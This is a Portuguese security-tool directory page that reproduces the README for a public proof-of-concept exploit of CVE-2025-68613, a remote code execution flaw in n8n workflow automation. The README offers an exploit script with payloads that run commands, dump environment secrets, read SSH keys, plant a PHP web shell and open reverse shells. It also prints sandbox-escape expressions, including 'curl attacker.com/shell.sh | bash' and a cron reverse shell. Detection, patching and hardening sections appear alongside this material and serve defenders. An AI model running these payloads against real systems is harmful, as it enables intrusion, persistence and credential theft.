Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/thestingr/cve-2025-68613-poc
ReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoPapers e PesquisaAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Red Teaming
Desenvolvimento de Payloads
GitHubthestingr/cve-2025-68613-poc

CVE-2025-68613-POC

PoC público + Scanner e pesquisa para CVE-2025-68613: RCE crítica na Automação de Fluxos de Trabalho n8n via Injeção de Expressão (CVSS 10.0). Inclui ferramentas de detecção, exploit completo e orientações de remediação.

Ver Repositório
263há 8 mesesRevisado pelo Kitploit
Compartilhar

🚨 CVE-2025-68613: Vulnerabilidade Crítica de RCE no n8n

Language: Python CVSS Score: 10.0 Critical Exploit Status: Proof of Concept Available CVE Status: CVE-2025-68613 Disclosed Version: v1.0.2 Target Platform: n8n

CVE-2025-68613 PoC - TechSquad RedTeam

Índice

  1. Visão Geral
  2. O que é o n8n?
  3. Fundamentos da Vulnerabilidade
  4. Detalhes Técnicos
  • Versões Afetadas
  • Mecânica de Exploração
  • Impacto no Mundo Real
  • Métodos de Detecção
  • Remediação e Mitigação
  • Recursos e Referências

  • Visão Geral

    CVE-2025-68613 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) descoberta no n8n, uma plataforma popular de automação de fluxos de trabalho de código aberto. Essa vulnerabilidade permite que usuários autenticados executem código arbitrário no servidor, podendo levar ao comprometimento total do sistema.

    Fatos Rápidos

    • ID do CVE: CVE-2025-68613
    • Pontuação CVSS: 9.9 - 10.0 (Crítica)
    • Tipo de Vulnerabilidade: Injeção de Expressão → Execução Remota de Código
    • CWE: CWE-913 (Controle Incorreto de Recursos de Código Gerenciados Dinamicamente)
    • Vetor de Ataque: Rede
    • Autenticação Necessária: Sim (privilégio baixo - sem necessidade de acesso de administrador)
    • Status: Prova de Conceito disponível (verificada funcionando na v1.121.0)

    O que é o n8n?

    O n8n é uma plataforma de automação de fluxos de trabalho de código aberto que permite aos usuários:

    • Conectar várias APIs, bancos de dados e serviços
    • Automatizar processos de negócios repetitivos
    • Criar fluxos de trabalho complexos sem necessidade de codificação extensa
    • Implantar localmente (on-premises) ou na nuvem

    Por que o n8n é Infraestrutura Crítica

    As organizações usam o n8n para:

    • Integrar bancos de dados com serviços em nuvem
    • Automatizar pipelines de processamento de dados
    • Conectar CRMs, ERPs e sistemas internos
    • Gerenciar dados confidenciais e credenciais de API

    Esse papel central na infraestrutura de TI torna as vulnerabilidades particularmente perigosas, pois podem fornecer aos atacantes acesso a redes inteiras e dados confidenciais.


    Ferramentas Neste Repositório

    Este repositório inclui ferramentas prontas para uso na detecção de vulnerabilidades e testes de exploração:

    1. Scanner: cve-2025-68613-scanner.py

    Objetivo: Detecção segura, sem exploração, de instâncias n8n vulneráveis

    Recursos:

    • Detecção passiva de versão a partir de respostas HTTP
    • Não requer autenticação
    • Sem execução de payload
    • Verifica múltiplos caminhos comuns (/, /rest/settings, /healthz, /api/v1/health)
    • Seguro para avaliações de segurança autorizadas

    Uso:```bash python3 cve-2025-68613-scanner.py -u http://target:5678

    root@kitploit:~
    **Saída**:
    - Código de saída 0: Não vulnerável
    - Código de saída 1: Versão indeterminada (pode estar corrigida ou oculta)
    - Código de saída 2: Versão vulnerável detectada
    
    ### 2. Nuclei Template: `CVE-2025-68613.yaml`
    **Propósito**: Detecção automatizada de vulnerabilidades e teste básico de avaliação de expressões
    
    **Características**:
    - Requer token de autenticação válido
    - Testa a capacidade de injeção de expressões
    - Tenta ler o contexto global do Node.js (process.platform)
    - Cria fluxos de trabalho de teste para validar o vetor de RCE
    - Classificação de severidade Crítica CVSS 10.0
    
    **Uso**:```bash
    # Single target with known token
    nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v
    
    # Multiple targets
    nuclei -t CVE-2025-68613.yaml -l targets.txt
    

    3. Exploit Completo: exploit_cve-2025-68613.py

    Objetivo: Exploit completo de prova de conceito com múltiplos payloads de ataque

    Recursos:

    • Tratamento completo de autenticação
    • Múltiplos payloads de exploração:
      • info: Coletar informações do sistema (SO, arquitetura, versão do Node.js, usuário atual)
      • cmd: Executar comandos arbitrários do sistema
      • env: Extrair todas as variáveis de ambiente (revela credenciais, chaves de API, segredos)
      • read: Ler arquivos sensíveis do sistema de arquivos (chaves SSH, arquivos de configuração, etc.)
      • write: Escrever arquivos no sistema de arquivos (persistência, backdoors, etc.)
      • revshell: Estabelecer conexão de shell reverso para acesso interativo
    • Limpeza automática do workflow
    • Tratamento de erros e relatório de status

    Requisitos:

    • Credenciais válidas de usuário do n8n (email/senha)
    • Python 3.6+ com a biblioteca requests
    • Acesso de rede à instância n8n alvo

    Instalação:```bash pip install requests chmod +x exploit_cve-2025-68613.py

    root@kitploit:~
    **Exemplos de Uso**:```bash
    # Gather system information
    python3 exploit_cve-2025-68613.py -u http://target:5678 \  
      -e [email protected] -p password --payload info
    
    # Execute system command (whoami)
    python3 exploit_cve-2025-68613.py -u http://target:5678 \  
      -e [email protected] -p password --payload cmd --command "whoami"
    
    # Extract all environment variables (credentials, API keys)
    python3 exploit_cve-2025-68613.py -u http://target:5678 \  
      -e [email protected] -p password --payload env
    
    # Read sensitive files
    python3 exploit_cve-2025-68613.py -u http://target:5678 \  
      -e [email protected] -p password --payload read --file "/etc/passwd"
    
    # Establish reverse shell (requires netcat listener)
    # On attacker machine: nc -lvnp 4444
    python3 exploit_cve-2025-68613.py -u http://target:5678 \  
      -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
    
    # Write a web shell for persistence
    python3 exploit_cve-2025-68613.py -u http://target:5678 \  
      -e [email protected] -p password --payload write \  
      --file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'
    

    Como Funciona:

    1. Autentica-se no n8n usando as credenciais fornecidas
    2. Cria um workflow malicioso com payload de injeção de expressão
    3. O payload escapa da sandbox de expressões usando this.constructor.constructor()
    4. Executa o payload via process.platform ou outras APIs do Node.js
    5. Recupera os resultados da execução do workflow
    6. Faz a limpeza excluindo o workflow de teste

    Códigos de Saída:

    • 0: Exploração bem-sucedida
    • 1: Autenticação ou exploração falhou

    Noções Básicas da Vulnerabilidade

    Qual é o Problema?

    Em termos simples: o n8n permite que os usuários escrevam expressões em workflows para processar dados dinamicamente. Porém, essas expressões são avaliadas sem um sandbox adequado, permitindo que atacantes escapem do contexto de execução pretendido e executem código arbitrário no servidor.

    O Problema Central

    Quando você cria um workflow no n8n, você pode usar "expressões" para manipular dados. Essas expressões deveriam ser executadas em um ambiente restrito. No entanto, a vulnerabilidade mostra que essas expressões podem acessar o sistema subjacente, permitindo que um atacante:

    1. Execute comandos do sistema
    2. Leia/grave arquivos no servidor
    3. Roube variáveis de ambiente (chaves de API, senhas, segredos)
    4. Modifique ou exclua dados
    5. Estabeleça persistência para acesso de longo prazo

    Por Que É Tão Perigoso

    • Baixa Barreira de Entrada: Exige apenas um login de usuário (sem privilégios especiais de administrador)
    • Ampla Aplicabilidade: Muitas organizações permitem que usuários não técnicos criem workflows
    • Alto Impacto: Executa com todos os privilégios do processo n8n
    • Acesso a Dados: Pode acessar todos os dados aos quais o n8n tem acesso (bancos de dados, APIs, credenciais)
    • Posição na Rede: o n8n frequentemente fica no centro da infraestrutura crítica, permitindo movimento lateral

    Detalhes Técnicos

    Como a Vulnerabilidade Funciona

    Etapa 1: Avaliação de Expressões no Workflow

    Quando um usuário cria um workflow no n8n, ele pode usar expressões para processar dados:``` Input: User creates a workflow with an expression n8n Expression Engine: Evaluates the expression Expected Output: Processed data Actual Output (Vulnerable): Expression execution context not isolated from runtime

    root@kitploit:~
    #### Passo 2: Injeção de Expressão
    Um atacante cria uma expressão maliciosa que escapa do sandbox pretendido:```javascript
    // Example: Malicious expression in workflow
    ${require('child_process').execSync('id')}
    

    Passo 3: Execução de Código

    A expressão é avaliada sem isolamento adequado, permitindo ao atacante:

    • Chamar funções do sistema
    • Executar comandos de shell
    • Aceder ao sistema de ficheiros
    • Ler variáveis de ambiente

    A Causa Raiz

    A vulnerabilidade decorre de sandboxing insuficiente no motor de avaliação de expressões. A equipa do n8n avaliou expressões num contexto que:

    • Permitía acesso a require() ou funções semelhantes de carregamento de módulos
    • Não restringia adequadamente o acesso a APIs do sistema
    • Não validava nem filtrava a sintaxe das expressões
    • Não impedia ataques de poluição de protótipos
    • Não isolava o ambiente de execução do runtime Node.js subjacente

    Caminho de Execução de Código```

    User Input (Workflow Expression) ↓ Expression Parser ↓ Evaluation Engine (VULNERABLE - Not Sandboxed) ↓ Direct Access to Node.js Runtime ↓ System Command Execution / File Access / Credential Theft

    root@kitploit:~
    ---
    
    ## Versões Afetadas
    
    ### Faixa Vulnerável
    
    Todas as versões do n8n, desde **0.211.0** até as seguintes versões, são vulneráveis:
    - `0.211.0` → `1.120.3`
    - `1.121.0`
    
    ### Versões Corrigidas
    
    A vulnerabilidade foi corrigida em:
    - ✅ `1.120.4` e posteriores no ramo 1.120.x
    - ✅ `1.121.1` e posteriores no ramo 1.121.x
    - ✅ `1.122.0` e todas as versões mais recentes
    
    ### Como Verificar Sua Versão```bash
    # If n8n is running
    curl http://your-n8n-instance:5678/ | grep -i "version"
    
    # Or check the admin panel
    # Go to Settings → About → Version
    

    Versões Testadas e Compatibilidade

    Verificado em Funcionamento

    • n8n v1.121.0: ✅ Totalmente explorável (RCE confirmado, injeção de expressões funcionando)
    • n8n v0.211.0 - v1.120.3: ✅ Dentro do intervalo vulnerável de acordo com a NVD (não testado individualmente)

    Problemas Conhecidos

    • Limitação de Execução via REST: O endpoint /rest/workflows/{id}/run retorna erro HTTP 500 na v1.121.0
      • Solução alternativa: A injeção de expressões funciona perfeitamente, RCE confirmado por meio de:
        1. Clique manual no botão "Test Step" na interface (comprovado que funciona)
        2. Captura de saída do workflow
      • Isto é uma limitação da API, não um bug da exploração

    Não Testado

    • n8n v0.212.0+: Fora do intervalo de vulnerabilidade documentado, provavelmente corrigido (ver GitHub issue #1)
    • Implantações em Windows Server: Dados de teste limitados em ambientes específicos do Windows

    Declaração de Suporte de Versões

    A exploração foi projetada para funcionar contra o intervalo vulnerável documentado na NVD:

    • Confirmadas como vulneráveis: 0.211.0 até 1.120.3, mais 1.121.0
    • Versões corrigidas: 1.120.4, 1.121.1, 1.122.0 e posteriores

    Se você testar versões fora desse intervalo, o sucesso não é garantido.


    Mecânica da Exploração

    O Que um Atacante Pode Fazer?

    Uma vez que um usuário autenticado (ou um atacante com credenciais válidas) explore esta vulnerabilidade, ele pode:

    1. Executar Comandos Arbitrários do Sistema```javascript

    ${require('child_process').execSync('whoami').toString()} // Returns: root (or whatever user runs n8n)

    ${require('child_process').execSync('curl attacker.com/shell.sh | bash').toString()} // Downloads and executes a shell script

    root@kitploit:~
    #### 2. Ler Arquivos do Servidor```javascript
    ${require('fs').readFileSync('/etc/passwd', 'utf-8')}
    // Reads sensitive system files
    
    ${require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf-8')}
    // Steals SSH keys
    

    3. Ler Variáveis de Ambiente```javascript

    ${Object.keys(process.env).join(', ')} // Lists all environment variables

    ${process.env.DATABASE_PASSWORD} // Extracts specific secrets

    root@kitploit:~
    #### 4. Escrever Arquivos Maliciosos```javascript
    ${require('fs').writeFileSync('/var/www/shell.php', 'malicious code')}
    // Plants a web shell for persistence
    
    ${require('fs').writeFileSync('/home/user/.ssh/authorized_keys', 'attacker_key')}
    // Adds SSH access
    

    5. Acessar Serviços Conectados```javascript

    // Access workflow credentials (stored API keys, passwords) // Modify or view connected databases // Exfiltrate data from all integrated systems

    root@kitploit:~
    #### 6. Estabelecer Persistência```javascript
    ${require('child_process').execSync('echo "* * * * * /bin/bash -i >& /dev/tcp/attacker.com/443 0>&1" | crontab -')}
    // Creates a cron job for reverse shell access
    
    ${require('child_process').execSync('useradd -m -s /bin/bash attacker')}
    // Creates a new user account
    

    Exemplo de Cenário de Ataque

    Cenário do Mundo Real: Empresa Usando n8n

    1. Atacante obtém credenciais: Por meio de phishing, reutilização de credenciais ou senha fraca
    2. Faz login no n8n: Usa conta de usuário legítima
    3. Cria um workflow "inofensivo": Alega que é para processamento de dados
    4. Injeta expressão maliciosa: Esconde o exploit em uma etapa do workflow
    5. Executa código: Executa comandos com privilégios do processo n8n
    6. Exfiltra dados: Rouba chaves de API, credenciais de banco de dados, dados de clientes
    7. Estabelece persistência: Instala backdoors, cria novas contas de administrador
    8. Move-se lateralmente: Usa credenciais roubadas para acessar outros sistemas

    Impacto no Mundo Real

    Impacto na Confidencialidade (ALTO)

    • Acesso a dados sensíveis processados por workflows
    • Extração de chaves de API, senhas de banco de dados, chaves de criptografia
    • Leitura de arquivos de configuração, logs e segredos
    • Potenciais violações de GDPR/conformidade por roubo de dados

    Impacto na Integridade (ALTO)

    • Modificação de workflows existentes para sabotar operações
    • Injeção de workflows maliciosos que corrompem dados
    • Alteração das saídas de workflows afetando sistemas downstream
    • Instalação de backdoors para acesso persistente

    Impacto na Disponibilidade (ALTO)

    • Exclusão de workflows críticos, causando interrupção dos negócios
    • Modificação de arquivos do sistema levando a falhas de serviço
    • Esgotamento de recursos por meio de automação maliciosa
    • Ataques de resgate em que atacantes exigem pagamento para restaurar sistemas

    Exemplos de Impacto nos Negócios

    Empresa de Manufatura

    • O n8n automatiza o processamento de pedidos e o gerenciamento de inventário
    • O atacante exfiltra pedidos de clientes e informações de fornecedores
    • Modifica workflows para enviar produtos errados aos clientes
    • Resultados: Perda de confiança do cliente, responsabilidade legal, interrupção operacional

    Serviços Financeiros

    • O n8n integra APIs bancárias e processamento de pagamentos
    • O atacante rouba credenciais de API e tokens de autenticação
    • Redireciona transações ou cria registros fraudulentos
    • Resultados: Penalidades regulatórias, compensação ao cliente, danos à reputação

    Organização de Saúde

    • O n8n lida com integração e relatórios de dados de pacientes
    • O atacante acessa informações de saúde protegidas (PHI)
    • Modifica prontuários médicos ou bloqueia alertas críticos
    • Resultados: Violações da HIPAA, danos aos pacientes, responsabilidade da organização

    Métodos de Detecção

    Método 1: Scanner de Detecção de Versão

    Script de detecção seguro e sem exploração (incluído no repositório original):```bash python3 CVE-2025-68613.py -u http://your-n8n-instance:5678

    root@kitploit:~
    **Exemplos de Saída**```
    [+] Target: http://127.0.0.1:5678
    [+] Possible n8n detected at /
    [+] Detected version: 1.120.2
    
    --- Result ---
    🚨 VULNERABLE
    Target version is affected by CVE-2025-68613
    

    Método 2: Usando o Template Nuclei

    Varredura automatizada com Nuclei:```bash

    Single target

    nuclei -t CVE-2025-68613.yaml -u http://target:5678

    Multiple targets from file

    nuclei -t CVE-2025-68613.yaml -l targets.txt

    root@kitploit:~
    **Como funciona**:
    1. Envia requisições HTTP para caminhos comuns do n8n
    2. Extrai metadados de versão de HTML/cabeçalhos
    3. Decodifica configuração codificada em base64, se presente
    4. Compara a versão com intervalos vulneráveis
    5. Informa se a instância está vulnerável
    
    ### Método 3: Captura Manual de Banner```bash
    # Check for n8n in HTTP response
    curl -s http://target:5678/ | grep -i "n8n"
    
    # Check headers
    curl -I http://target:5678/ | grep -i "n8n"
    
    # Check common paths
    curl -s http://target:5678/api/v1/health
    curl -s http://target:5678/rest/settings
    curl -s http://target:5678/healthz
    

    Método 4: Reconhecimento de Rede```bash

    Find n8n instances using Shodan

    shodan search "n8n" --limit 10

    Use favicon hash detection

    nmap -p 5678 --script http-favicon target.com

    root@kitploit:~
    ### Indicadores de Exploração (IOCs)
    
    **Sinais em Logs**:
    - Avaliações incomuns de expressões em logs de fluxo de trabalho
    - Erros de expressão contendo comandos do sistema
    - Acesso a arquivos sensíveis (por exemplo, referências a /etc/passwd)
    - Inicialização inesperada de processos a partir do processo n8n
    
    **Sinais do Sistema**:
    - Novas contas de usuário criadas no servidor
    - Chaves SSH inesperadas em authorized_keys
    - Novos cron jobs ou tarefas agendadas
    - Modificações em arquivos do sistema
    - Conexões de shell reverso a partir do servidor n8n
    
    ---
    
    ## Remediação e Mitigação
    
    ### SOLUÇÃO PRIMÁRIA: Atualização Imediata
    
    **Esta é a única correção completa para a vulnerabilidade.**
    
    #### Passo 1: Faça Backup dos Seus Dados```bash
    # Backup n8n database
    cp -r /path/to/n8n/database ./backup/
    
    # Backup workflows
    n8n export --backup-dir ./backup/
    

    Passo 2: Atualizar o n8n

    Usando Docker (Recomendado):```bash

    Pull the latest patched version

    docker pull n8nio/n8n:1.122.0 # Or later

    Stop current instance

    docker stop n8n-container

    Start with new version

    docker run -d --name n8n-patched
    -p 5678:5678
    -v n8n_data:/home/node/.n8n
    n8nio/n8n:1.122.0

    root@kitploit:~
    **Usando npm**:```bash
    # Backup first
    npm run export --backup
    
    # Update
    npm update n8n
    
    # Or specific version
    npm install [email protected]
    

    Usando o Gerenciador de Pacotes do Sistema:```bash

    Debian/Ubuntu

    sudo apt update && sudo apt upgrade n8n

    Or manual download

    wget https://github.com/n8n-io/n8n/releases/download/[email protected]/n8n.tar.gz

    root@kitploit:~
    #### Passo 3: Verifique a Atualização```bash
    # Check version after update
    curl http://localhost:5678/api/v1/health | grep version
    
    # Ensure n8n is running
    curl http://localhost:5678/ | grep -i "n8n"
    

    MITIGAÇÃO TEMPORÁRIA: Durante a Atualização

    Importante: Elas NÃO corrigem a vulnerabilidade. Use somente como medidas temporárias enquanto planeja as atualizações.

    1. Restringir Permissões do Workflow```

    n8n Admin Panel → Users & Permissions ├── Disable "User Can Create Workflows" for non-admin users ├── Restrict "User Can Edit Workflows" to trusted administrators only ├── Review existing user roles and remove unnecessary permissions └── Audit workflow creators for suspicious accounts

    root@kitploit:~
    #### 2. Monitorar Alterações de Fluxo de Trabalho```
    n8n Admin Panel → Settings → Audit Log
    ├── Enable comprehensive audit logging
    ├── Monitor for suspicious workflow modifications
    ├── Alert on expression evaluations in logs
    └── Review workflow change history regularly
    

    3. Isolamento de Rede```bash

    Restrict n8n network access

    sudo ufw default deny incoming sudo ufw allow from 192.168.1.0/24 to any port 5678 # Only internal network sudo ufw enable

    Or using iptables

    sudo iptables -A INPUT -p tcp --dport 5678 -s 192.168.1.0/24 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 5678 -j DROP

    root@kitploit:~
    #### 4. Execute o n8n com Privilégios Mínimos```bash
    # Create dedicated n8n user
    sudo useradd -r -s /bin/false n8n-user
    
    # Run n8n as this user
    sudo -u n8n-user n8n
    
    # Or in Docker with user specification
    docker run -u 1000 n8nio/n8n:latest
    

    5. Ativar Autenticação Forte```

    n8n Admin Panel → Settings → Authentication ├── Enable 2FA for all accounts ├── Enforce strong password policies ├── Review and disable unnecessary service accounts ├── Implement SSO if available └── Disable any guest/demo accounts

    root@kitploit:~
    #### 6. Containerização & Isolamento```bash
    # Run n8n in a restricted Docker container
    docker run -d \
      --security-opt=no-new-privileges:true \
      --read-only \
      --cap-drop=ALL \
      --cap-add=NET_BIND_SERVICE \
      --tmpfs /tmp \
      -p 5678:5678 \
      n8nio/n8n:current-version
    

    7. Auditoria Regular```bash

    Monitor for suspicious activities

    Check for new files in n8n directories

    find /path/to/n8n -type f -mtime -1

    Monitor process activity

    ps aux | grep n8n netstat -tlnp | grep n8n

    Check for unauthorized SSH keys

    cat ~/.ssh/authorized_keys

    Review system logs

    journalctl -u n8n -n 100

    root@kitploit:~
    ---
    
    ## Matriz de Avaliação de Riscos
    
    | Cenário | Nível de Risco | Probabilidade | Impacto | Prioridade |
    |----------|-----------|-----------|--------|----------|
    | n8n sem correção, exposto à internet | CRÍTICO | ALTO | Comprometimento total | 🔴 URGENTE |
    | n8n sem correção, somente interno | ALTO | MÉDIO | Risco de ameaça interna | 🟠 ALTO |
    | n8n corrigido | BAIXO | BAIXO | N/A | ✅ Resolvido |
    | Sem correção + restrições de permissão | MÉDIO | MÉDIO | Limitado a usuários confiáveis | 🟡 MÉDIO |
    
    ---
    
    ## Recuperação Passo a Passo em Caso de Comprometimento
    
    ### Ações Imediatas (Primeira Hora)
    1. **Isolar o sistema**: Desconectar da rede
    2. **Parar o serviço**: `sudo systemctl stop n8n`
    3. **Preservar logs**: Fazer backup de todos os logs antes de apagar
    4. **Alertar equipe**: Notificar a equipe de segurança e a gerência
    5. **Avaliar o escopo**: Determinar quais dados o n8n acessou
    
    ### Investigação (Primeiro Dia)
    1. **Revisar logs de auditoria**: Procurar atividades suspeitas
    2. **Analisar tráfego de rede**: Procurar exfiltração de dados
    3. **Verificar modificações em arquivos**: Encontrar backdoors plantados
    4. **Revisar contas de usuário**: Procurar contas novas ou modificadas
    5. **Auditoria de credenciais**: Redefinir todas as chaves de API e senhas usadas pelo n8n
    
    ### Remediação (Dias 2-7)
    1. **Reconstrução completa do sistema**: Não apenas atualize, reconstrua a partir de uma imagem limpa
    2. **Rotação de credenciais**: Redefina todas as senhas, chaves de API e tokens
    3. **Corrija tudo**: Atualize todos os sistemas conectados
    4. **Restaurar a partir de backup**: Use backups limpos anteriores ao comprometimento
    5. **Auditoria de segurança**: Conduza uma avaliação completa de segurança
    
    ### Pós-Incidente (Semanas 2+)
    1. **Implementar monitoramento**: Configure registro contínuo e alertas
    2. **Mudanças de processo**: Atualize os procedimentos de resposta a incidentes
    3. **Treinamento de usuários**: Eduque as equipes sobre boas práticas de segurança
    4. **Varredura de vulnerabilidades**: Exames regulares para problemas semelhantes
    5. **Revisão de conformidade**: Garanta o cumprimento de todos os regulamentos (GDPR, HIPAA, etc.)
    
    ---
    
    ## Prevenção para o Futuro
    
    ### Melhores Práticas de Segurança para n8n
    
    1. **Mantenha o n8n Atualizado**
       - Ative atualizações automáticas se disponíveis
       - Assine os avisos de segurança do n8n
       - Teste os patches em ambiente de homologação antes da produção
    
    2. **Controle de Acesso**
       - Use o princípio do menor privilégio
       - Exija senhas fortes e 2FA
       - Implemente SSO para implantações empresariais
       - Revisões e auditorias regulares de acesso
    
    3. **Gerenciamento de Workflows**
       - Revise todos os workflows para lógica suspeita
       - Implemente um processo de revisão de código para workflows
       - Use convenções de nomenclatura para identificar workflows críticos
       - Faça backup regular dos workflows
    
    4. **Gerenciamento de Credenciais**
       - Nunca armazene credenciais em workflows
       - Use variáveis de ambiente para dados sensíveis
       - Faça rotação de credenciais regularmente
       - Audite o acesso às credenciais
    
    5. **Monitoramento e Registro (Logs)**
       - Ative o registro de auditoria abrangente
       - Monitore atividades incomuns
       - Configure alertas para operações suspeitas
       - Revisão e análise regulares de logs
    
    6. **Segurança de Rede**
       - Execute o n8n em segmentos de rede isolados
       - Restrinja o acesso à rede apenas aos serviços necessários
       - Use VPN/firewall para acesso remoto
       - Monitore o tráfego de rede para anomalias
    
    7. **Resposta a Incidentes**
       - Crie um plano de resposta a incidentes
       - Defina procedimentos de escalonamento
       - Realize exercícios regulares de segurança
       - Mantenha listas de contatos atualizadas
    
    ---
    
    ## Solução de Problemas
    
    ### Problema: "Exit code 1: Authentication or exploitation failed"
    
    **Causas Comuns**:
    1. **Credenciais incorretas** (mais comum)
       - Solução: Verifique se as credenciais funcionam para o login na interface web primeiro
       - Tente: `curl -X POST http://target:5678/rest/login -d '{"emailOrLdapLoginId":"[email protected]","password":"pass"}'`
    
    2. **O usuário não tem permissões de criação de workflows**
       - Solução: Use uma conta de administrador ou usuário com direitos de criação de workflows
       - Verifique: Verifique o painel administrativo → Usuários e Permissões
    
    3. **Versão corrigida** (versão > 1.121.0)
       - Solução: Use o scanner para verificar a versão primeiro: `python3 cve-2025-68613-scanner.py -u http://target:5678`
       - Esperado: O scanner deve exibir "Vulnerable" (código de saída 2)
    
    4. **Estrutura da API alterada** (versões mais antigas/novas podem diferir)
       - Solução: Verifique o aviso da NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-68613
       - Mais provável se estiver testando versões fora da faixa documentada
    
    5. **Bloqueio de rede/firewall**
       - Solução: Verifique a conectividade: `curl http://target:5678/`
       - Verifique: Regras de firewall, configurações de proxy, certificados SSL
    
    ### Problema: O scanner relata falsos positivos (detectando versão errada)
    
    **Corrigido na v1.02**: O scanner agora usa a configuração Sentry decodificada em base64 das meta tags em vez de regex simples. Isso elimina falsos positivos em que a versão do Node.js era detectada como versão do n8n.
    
    **O que mudou**:
    - Fonte principal: Extrair e decodificar `<meta name="n8n:config:sentry" content="[BASE64]">`
    - Alternativa: Só usa regex se a configuração Sentry estiver indisponível
    - Resultado: Detecção precisa de versão sem falsos positivos
    
    **Para usar o scanner v1.02**:```bash
    # Update to v1.02
    git pull origin main
    
    # Run scanner
    python3 cve-2025-68613-scanner.py -u http://target:5678
    

    Problema: A execução REST retorna erro 500

    Isto NÃO é um bug no exploit - é uma limitação da API.

    Explicação:

    • O endpoint /rest/workflows/{id}/run retorna HTTP 500 no n8n v1.121.0
    • Esta é uma limitação de design da API do n8n, não um bug do exploit
    • A injeção de expressões AINDA FUNCIONA através da UI

    Solução alternativa:

    1. O exploit cria um workflow com expressão maliciosa ✅ Funciona
    2. A expressão avalia e executa código ✅ Funciona (comprovado por testes manuais)
    3. Clicar manualmente no botão "Test Step" na UI para acionar a expressão ✅ Funciona
    4. Ler a saída dos resultados do workflow ✅ Funciona

    Evidência: Flag capturada no TryHackMe: THM{n8n_exposed_workflow}


    Recursos e Referências

    Fontes Oficiais

    • Repositório GitHub do n8n: https://github.com/n8n-io/n8n
    • Avisos de Segurança do n8n: https://github.com/n8n-io/n8n/security/advisories
    • Documentação do n8n: https://docs.n8n.io/

    Informações do CVE

    • Entrada NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-68613
    • CVEDetails: https://www.cvedetails.com/cve/CVE-2025-68613/
    • CVETodo: https://cvetodo.com/cve/CVE-2025-68613

    Recursos de Segurança

    • NIST CWE-913: https://cwe.mitre.org/data/definitions/913.html
    • OWASP Injeção de Código: https://owasp.org/www-community/attacks/Code_Injection
    • OWASP Bypass de Sandbox: https://owasp.org/www-community/attacks/Sandbox_Escape

    Resumo

    CVE-2025-68613 é uma vulnerabilidade crítica que requer ação imediata. A combinação de:

    • Capacidade de injeção de expressões
    • Falta de sandboxing
    • Baixos requisitos de privilégio
    • Ampla superfície de ataque (muitos usuários criam workflows)
    • Posição central na infraestrutura de TI

    ...torna esta uma das vulnerabilidades mais perigosas em plataformas de automação de workflows.

    A solução simples: Atualize para uma versão corrigida imediatamente. Não há desculpa para permanecer vulnerável a um RCE crítico quando patches estão disponíveis.


    Versão do Documento

    |- Versão: 1.02 |- Data de Criação: 18 de dezembro de 2025 |- Última Atualização: 26 de dezembro de 2025

    • Status: Completo
    • Autor: The StingR / TechSquad Inc.
    • Organização: TechSquad Inc.

    Aviso Legal

    Este documento é fornecido apenas para fins educacionais e de avaliação de segurança autorizada. O acesso não autorizado a sistemas de computador é ilegal. Sempre garanta que você tenha a devida autorização antes de testar, avaliar ou acessar sistemas que você não possui.


    ⚠️ LEMBRE-SE: Atualize suas instâncias do n8n imediatamente se estiver executando versões vulneráveis.

    Baixar ferramenta